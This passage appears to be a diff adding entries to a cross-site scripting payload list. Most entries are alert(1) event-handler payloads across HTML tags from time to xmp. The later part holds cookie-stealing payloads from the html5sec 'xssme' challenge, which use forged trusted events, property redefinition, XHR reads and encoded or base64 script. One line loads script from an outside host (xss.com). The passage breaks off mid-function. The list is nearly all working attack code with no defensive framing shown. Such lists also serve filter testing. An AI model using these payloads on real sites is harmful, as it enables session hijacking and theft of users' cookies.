+<time onclick="alert(1)">test</time> +<time oncontextmenu="alert(1)">test</time> +<time oncopy="alert(1)" contenteditable>test</time> +<time oncut="alert(1)" contenteditable>test</time> +<time ondblclick="alert(1)">test</time> +<time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> +<time onkeydown="alert(1)" contenteditable>test</time> +<time onkeypress="alert(1)" contenteditable>test</time> +<time onkeyup="alert(1)" contenteditable>test</time> +<time onmousedown="alert(1)">test</time> +<time onmouseenter="alert(1)">test</time> +<time onmouseleave="alert(1)">test</time> +<time onmousemove="alert(1)">test</time> +<time onmouseout="alert(1)">test</time> +<time onmouseover="alert(1)">test</time> +<time onmouseup="alert(1)">test</time> +<time onpaste="alert(1)" contenteditable>test</time> +<title draggable="true" ondrag="alert(1)">test</title> +<title draggable="true" ondragend="alert(1)">test</title> +<title draggable="true" ondragenter="alert(1)">test</title> +<title draggable="true" ondragleave="alert(1)">test</title> +<title draggable="true" ondragstart="alert(1)">test</title> +<title id=x tabindex=1 onactivate=alert(1)></title> +<title id=x tabindex=1 onbeforeactivate=alert(1)></title> +<title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> +<title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> +<title id=x tabindex=1 onfocus=alert(1)></title> +<title id=x tabindex=1 onfocusin=alert(1)></title> +<title onbeforecopy="alert(1)" contenteditable>test</title> +<title onbeforecut="alert(1)" contenteditable>test</title> +<title onbeforepaste="alert(1)" contenteditable>test</title> +<title onblur=alert(1) tabindex=1 id=x></title><input autofocus> +<title onclick="alert(1)">test</title> +<title oncontextmenu="alert(1)">test</title> +<title oncopy="alert(1)" contenteditable>test</title> +<title oncut="alert(1)" contenteditable>test</title> +<title ondblclick="alert(1)">test</title> +<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> +<title onkeydown="alert(1)" contenteditable>test</title> +<title onkeypress="alert(1)" contenteditable>test</title> +<title onkeyup="alert(1)" contenteditable>test</title> +<title onmousedown="alert(1)">test</title> +<title onmouseenter="alert(1)">test</title> +<title onmouseleave="alert(1)">test</title> +<title onmousemove="alert(1)">test</title> +<title onmouseout="alert(1)">test</title> +<title onmouseover="alert(1)">test</title> +<title onmouseup="alert(1)">test</title> +<title onpaste="alert(1)" contenteditable>test</title> +<tr draggable="true" ondrag="alert(1)">test</tr> +<tr draggable="true" ondragend="alert(1)">test</tr> +<tr draggable="true" ondragenter="alert(1)">test</tr> +<tr draggable="true" ondragleave="alert(1)">test</tr> +<tr draggable="true" ondragstart="alert(1)">test</tr> +<tr id=x tabindex=1 onactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> +<tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> +<tr id=x tabindex=1 onfocus=alert(1)></tr> +<tr id=x tabindex=1 onfocusin=alert(1)></tr> +<tr onbeforecopy="alert(1)" contenteditable>test</tr> +<tr onbeforecut="alert(1)" contenteditable>test</tr> +<tr onbeforepaste="alert(1)" contenteditable>test</tr> +<tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onclick="alert(1)">test</tr> +<tr oncontextmenu="alert(1)">test</tr> +<tr oncopy="alert(1)" contenteditable>test</tr> +<tr oncut="alert(1)" contenteditable>test</tr> +<tr ondblclick="alert(1)">test</tr> +<tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> +<tr onkeydown="alert(1)" contenteditable>test</tr> +<tr onkeypress="alert(1)" contenteditable>test</tr> +<tr onkeyup="alert(1)" contenteditable>test</tr> +<tr onmousedown="alert(1)">test</tr> +<tr onmouseenter="alert(1)">test</tr> +<tr onmouseleave="alert(1)">test</tr> +<tr onmousemove="alert(1)">test</tr> +<tr onmouseout="alert(1)">test</tr> +<tr onmouseover="alert(1)">test</tr> +<tr onmouseup="alert(1)">test</tr> +<tr onpaste="alert(1)" contenteditable>test</tr> +<track draggable="true" ondrag="alert(1)">test</track> +<track draggable="true" ondragend="alert(1)">test</track> +<track draggable="true" ondragenter="alert(1)">test</track> +<track draggable="true" ondragleave="alert(1)">test</track> +<track draggable="true" ondragstart="alert(1)">test</track> +<track id=x tabindex=1 onactivate=alert(1)></track> +<track id=x tabindex=1 onbeforeactivate=alert(1)></track> +<track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> +<track id=x tabindex=1 onfocus=alert(1)></track> +<track id=x tabindex=1 onfocusin=alert(1)></track> +<track onbeforecopy="alert(1)" contenteditable>test</track> +<track onbeforecut="alert(1)" contenteditable>test</track> +<track onbeforepaste="alert(1)" contenteditable>test</track> +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus> +<track onclick="alert(1)">test</track> +<track oncontextmenu="alert(1)">test</track> +<track oncopy="alert(1)" contenteditable>test</track> +<track oncut="alert(1)" contenteditable>test</track> +<track ondblclick="alert(1)">test</track> +<track onfocusout=alert(1) tabindex=1 id=x></track><input autofocus> +<track onkeydown="alert(1)" contenteditable>test</track> +<track onkeypress="alert(1)" contenteditable>test</track> +<track onkeyup="alert(1)" contenteditable>test</track> +<track onmousedown="alert(1)">test</track> +<track onmouseenter="alert(1)">test</track> +<track onmouseleave="alert(1)">test</track> +<track onmousemove="alert(1)">test</track> +<track onmouseout="alert(1)">test</track> +<track onmouseover="alert(1)">test</track> +<track onmouseup="alert(1)">test</track> +<track onpaste="alert(1)" contenteditable>test</track> +<tt draggable="true" ondrag="alert(1)">test</tt> +<tt draggable="true" ondragend="alert(1)">test</tt> +<tt draggable="true" ondragenter="alert(1)">test</tt> +<tt draggable="true" ondragleave="alert(1)">test</tt> +<tt draggable="true" ondragstart="alert(1)">test</tt> +<tt id=x tabindex=1 onactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt> +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></tt><input autofocus> +<tt id=x tabindex=1 ondeactivate=alert(1)></tt><input id=y autofocus> +<tt id=x tabindex=1 onfocus=alert(1)></tt> +<tt id=x tabindex=1 onfocusin=alert(1)></tt> +<tt onbeforecopy="alert(1)" contenteditable>test</tt> +<tt onbeforecut="alert(1)" contenteditable>test</tt> +<tt onbeforepaste="alert(1)" contenteditable>test</tt> +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onclick="alert(1)">test</tt> +<tt oncontextmenu="alert(1)">test</tt> +<tt oncopy="alert(1)" contenteditable>test</tt> +<tt oncut="alert(1)" contenteditable>test</tt> +<tt ondblclick="alert(1)">test</tt> +<tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus> +<tt onkeydown="alert(1)" contenteditable>test</tt> +<tt onkeypress="alert(1)" contenteditable>test</tt> +<tt onkeyup="alert(1)" contenteditable>test</tt> +<tt onmousedown="alert(1)">test</tt> +<tt onmouseenter="alert(1)">test</tt> +<tt onmouseleave="alert(1)">test</tt> +<tt onmousemove="alert(1)">test</tt> +<tt onmouseout="alert(1)">test</tt> +<tt onmouseover="alert(1)">test</tt> +<tt onmouseup="alert(1)">test</tt> +<tt onpaste="alert(1)" contenteditable>test</tt> +<u draggable="true" ondrag="alert(1)">test</u> +<u draggable="true" ondragend="alert(1)">test</u> +<u draggable="true" ondragenter="alert(1)">test</u> +<u draggable="true" ondragleave="alert(1)">test</u> +<u draggable="true" ondragstart="alert(1)">test</u> +<u id=x tabindex=1 onactivate=alert(1)></u> +<u id=x tabindex=1 onbeforeactivate=alert(1)></u> +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus> +<u id=x tabindex=1 ondeactivate=alert(1)></u><input id=y autofocus> +<u id=x tabindex=1 onfocus=alert(1)></u> +<u id=x tabindex=1 onfocusin=alert(1)></u> +<u onbeforecopy="alert(1)" contenteditable>test</u> +<u onbeforecut="alert(1)" contenteditable>test</u> +<u onbeforepaste="alert(1)" contenteditable>test</u> +<u onblur=alert(1) tabindex=1 id=x></u><input autofocus> +<u onclick="alert(1)">test</u> +<u oncontextmenu="alert(1)">test</u> +<u oncopy="alert(1)" contenteditable>test</u> +<u oncut="alert(1)" contenteditable>test</u> +<u ondblclick="alert(1)">test</u> +<u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus> +<u onkeydown="alert(1)" contenteditable>test</u> +<u onkeypress="alert(1)" contenteditable>test</u> +<u onkeyup="alert(1)" contenteditable>test</u> +<u onmousedown="alert(1)">test</u> +<u onmouseenter="alert(1)">test</u> +<u onmouseleave="alert(1)">test</u> +<u onmousemove="alert(1)">test</u> +<u onmouseout="alert(1)">test</u> +<u onmouseover="alert(1)">test</u> +<u onmouseup="alert(1)">test</u> +<u onpaste="alert(1)" contenteditable>test</u> +<ul draggable="true" ondrag="alert(1)">test</ul> +<ul draggable="true" ondragend="alert(1)">test</ul> +<ul draggable="true" ondragenter="alert(1)">test</ul> +<ul draggable="true" ondragleave="alert(1)">test</ul> +<ul draggable="true" ondragstart="alert(1)">test</ul> +<ul id=x tabindex=1 onactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul> +<ul id=x tabindex=1 onbeforedeactivate=alert(1)></ul><input autofocus> +<ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus> +<ul id=x tabindex=1 onfocus=alert(1)></ul> +<ul id=x tabindex=1 onfocusin=alert(1)></ul> +<ul onbeforecopy="alert(1)" contenteditable>test</ul> +<ul onbeforecut="alert(1)" contenteditable>test</ul> +<ul onbeforepaste="alert(1)" contenteditable>test</ul> +<ul onblur=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onclick="alert(1)">test</ul> +<ul oncontextmenu="alert(1)">test</ul> +<ul oncopy="alert(1)" contenteditable>test</ul> +<ul oncut="alert(1)" contenteditable>test</ul> +<ul ondblclick="alert(1)">test</ul> +<ul onfocusout=alert(1) tabindex=1 id=x></ul><input autofocus> +<ul onkeydown="alert(1)" contenteditable>test</ul> +<ul onkeypress="alert(1)" contenteditable>test</ul> +<ul onkeyup="alert(1)" contenteditable>test</ul> +<ul onmousedown="alert(1)">test</ul> +<ul onmouseenter="alert(1)">test</ul> +<ul onmouseleave="alert(1)">test</ul> +<ul onmousemove="alert(1)">test</ul> +<ul onmouseout="alert(1)">test</ul> +<ul onmouseover="alert(1)">test</ul> +<ul onmouseup="alert(1)">test</ul> +<ul onpaste="alert(1)" contenteditable>test</ul> +<var draggable="true" ondrag="alert(1)">test</var> +<var draggable="true" ondragend="alert(1)">test</var> +<var draggable="true" ondragenter="alert(1)">test</var> +<var draggable="true" ondragleave="alert(1)">test</var> +<var draggable="true" ondragstart="alert(1)">test</var> +<var id=x tabindex=1 onactivate=alert(1)></var> +<var id=x tabindex=1 onbeforeactivate=alert(1)></var> +<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> +<var id=x tabindex=1 onfocus=alert(1)></var> +<var id=x tabindex=1 onfocusin=alert(1)></var> +<var onbeforecopy="alert(1)" contenteditable>test</var> +<var onbeforecut="alert(1)" contenteditable>test</var> +<var onbeforepaste="alert(1)" contenteditable>test</var> +<var onblur=alert(1) tabindex=1 id=x></var><input autofocus> +<var onclick="alert(1)">test</var> +<var oncontextmenu="alert(1)">test</var> +<var oncopy="alert(1)" contenteditable>test</var> +<var oncut="alert(1)" contenteditable>test</var> +<var ondblclick="alert(1)">test</var> +<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> +<var onkeydown="alert(1)" contenteditable>test</var> +<var onkeypress="alert(1)" contenteditable>test</var> +<var onkeyup="alert(1)" contenteditable>test</var> +<var onmousedown="alert(1)">test</var> +<var onmouseenter="alert(1)">test</var> +<var onmouseleave="alert(1)">test</var> +<var onmousemove="alert(1)">test</var> +<var onmouseout="alert(1)">test</var> +<var onmouseover="alert(1)">test</var> +<var onmouseup="alert(1)">test</var> +<var onpaste="alert(1)" contenteditable>test</var> +<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video draggable="true" ondrag="alert(1)">test</video> +<video draggable="true" ondragend="alert(1)">test</video> +<video draggable="true" ondragenter="alert(1)">test</video> +<video draggable="true" ondragleave="alert(1)">test</video> +<video draggable="true" ondragstart="alert(1)">test</video> +<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x tabindex=1 onactivate=alert(1)></video> +<video id=x tabindex=1 onbeforeactivate=alert(1)></video> +<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> +<video onbeforecopy="alert(1)" contenteditable>test</video> +<video onbeforecut="alert(1)" contenteditable>test</video> +<video onbeforepaste="alert(1)" contenteditable>test</video> +<video onblur=alert(1) tabindex=1 id=x></video><input autofocus> +<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onclick="alert(1)">test</video> +<video oncontextmenu="alert(1)">test</video> +<video oncopy="alert(1)" contenteditable>test</video> +<video oncut="alert(1)" contenteditable>test</video> +<video ondblclick="alert(1)">test</video> +<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> +<video onkeydown="alert(1)" contenteditable>test</video> +<video onkeypress="alert(1)" contenteditable>test</video> +<video onkeyup="alert(1)" contenteditable>test</video> +<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onmousedown="alert(1)">test</video> +<video onmouseenter="alert(1)">test</video> +<video onmouseleave="alert(1)">test</video> +<video onmousemove="alert(1)">test</video> +<video onmouseout="alert(1)">test</video> +<video onmouseover="alert(1)">test</video> +<video onmouseup="alert(1)">test</video> +<video onpaste="alert(1)" contenteditable>test</video> +<video src/onerror=alert(1)> +<video><source onerror=alert(1) src=1></video> +<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> +<wbr draggable="true" ondrag="alert(1)">test</wbr> +<wbr draggable="true" ondragend="alert(1)">test</wbr> +<wbr draggable="true" ondragenter="alert(1)">test</wbr> +<wbr draggable="true" ondragleave="alert(1)">test</wbr> +<wbr draggable="true" ondragstart="alert(1)">test</wbr> +<wbr id=x tabindex=1 onactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> +<wbr id=x tabindex=1 onfocus=alert(1)></wbr> +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr> +<wbr onbeforecopy="alert(1)" contenteditable>test</wbr> +<wbr onbeforecut="alert(1)" contenteditable>test</wbr> +<wbr onbeforepaste="alert(1)" contenteditable>test</wbr> +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onclick="alert(1)">test</wbr> +<wbr oncontextmenu="alert(1)">test</wbr> +<wbr oncopy="alert(1)" contenteditable>test</wbr> +<wbr oncut="alert(1)" contenteditable>test</wbr> +<wbr ondblclick="alert(1)">test</wbr> +<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onkeydown="alert(1)" contenteditable>test</wbr> +<wbr onkeypress="alert(1)" contenteditable>test</wbr> +<wbr onkeyup="alert(1)" contenteditable>test</wbr> +<wbr onmousedown="alert(1)">test</wbr> +<wbr onmouseenter="alert(1)">test</wbr> +<wbr onmouseleave="alert(1)">test</wbr> +<wbr onmousemove="alert(1)">test</wbr> +<wbr onmouseout="alert(1)">test</wbr> +<wbr onmouseover="alert(1)">test</wbr> +<wbr onmouseup="alert(1)">test</wbr> +<wbr onpaste="alert(1)" contenteditable>test</wbr> +<xmp draggable="true" ondrag="alert(1)">test</xmp> +<xmp draggable="true" ondragend="alert(1)">test</xmp> +<xmp draggable="true" ondragenter="alert(1)">test</xmp> +<xmp draggable="true" ondragleave="alert(1)">test</xmp> +<xmp draggable="true" ondragstart="alert(1)">test</xmp> +<xmp id=x tabindex=1 onactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> +<xmp id=x tabindex=1 onfocus=alert(1)></xmp> +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp> +<xmp onbeforecopy="alert(1)" contenteditable>test</xmp> +<xmp onbeforecut="alert(1)" contenteditable>test</xmp> +<xmp onbeforepaste="alert(1)" contenteditable>test</xmp> +<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onclick="alert(1)">test</xmp> +<xmp oncontextmenu="alert(1)">test</xmp> +<xmp oncopy="alert(1)" contenteditable>test</xmp> +<xmp oncut="alert(1)" contenteditable>test</xmp> +<xmp ondblclick="alert(1)">test</xmp> +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onkeydown="alert(1)" contenteditable>test</xmp> +<xmp onkeypress="alert(1)" contenteditable>test</xmp> +<xmp onkeyup="alert(1)" contenteditable>test</xmp> +<xmp onmousedown="alert(1)">test</xmp> +<xmp onmouseenter="alert(1)">test</xmp> +<xmp onmouseleave="alert(1)">test</xmp> +<xmp onmousemove="alert(1)">test</xmp> +<xmp onmouseout="alert(1)">test</xmp> +<xmp onmouseover="alert(1)">test</xmp> +<xmp onmouseup="alert(1)">test</xmp> +<xmp onpaste="alert(1)" contenteditable>test</xmp> +<xss id=x tabindex=1 onactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onfocus=alert(1)></xss> +<xss id=x tabindex=1 onfocusin=alert(1)></xss> +<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus> +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { 